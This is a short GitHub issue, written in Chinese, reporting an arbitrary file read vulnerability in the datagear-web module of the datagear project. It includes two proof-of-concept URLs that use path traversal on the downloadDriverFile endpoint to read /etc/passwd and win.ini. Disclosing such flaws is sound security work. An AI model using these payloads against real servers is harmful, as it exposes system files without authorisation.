datageartech/datagear

存在任意文件读取漏洞

Firebasky opened this issue · 2 comments

亲爱的朋友,该项目存在一个安全漏洞。
image

poc:
url/driverEntity/downloadDriverFile?id=1?file=../../.../../../../../../../etc/passwd

漏洞存在是在datagear-web模块中

poc:

/driverEntity/downloadDriverFile?id=1&file=../../.../../../../../../../../../Windows/win.ini